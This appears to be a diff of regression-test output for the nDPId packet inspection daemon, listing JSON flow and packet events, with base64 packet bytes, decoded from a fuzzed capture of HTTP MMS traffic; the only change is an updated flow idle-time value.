+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854535021} 02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFACVzAEtAAIAGcJasFAMFrBQDDQotAFDk8Vvgym1xzFAQIjhHEAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXB0OiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0Rm9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IENuDQpVc2VyLUFnZW50OiBTb255inJpY3Nzb25UNjgvUjIwMUENCkFjY2Vw9C1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdqdyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0ibHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2Nja3BzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhJXMAcmRmOmxpPmFwcGxpY2F0aW9uL3ZubC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkZjpCYWc+PC9wcmY6Q2NwcEFjY2VwdD48L3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYt1TogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vUmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIiVzAC0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IEQlcwB1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtJj48cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854535294} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854535090,"pkt":"CAAgsl17AFCLk5N8CAAQAAAoKUtAAIAGc0qsFAMFrBQDDQotAFDk8WM7ym1yW1AQIamgfQAAYXRpb24v"} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854543322} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854543315,"pkt":"AFCLk5N8CAAgsl17CABFAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546078,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMpAAEAGF8usFAMNrBQDBQBQCk\/KbXJb5PFjPFAQgyw++QAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546079,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546079,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMtAAEAGF8qsNAMNrBQDBQBQCC3KbXJb5PFjPFARuSw++AAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546078,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMpAAEAGF8usFAMNrBQDBQBQCk\/KbXJb5PFjPFAQgyw++QAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546079,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 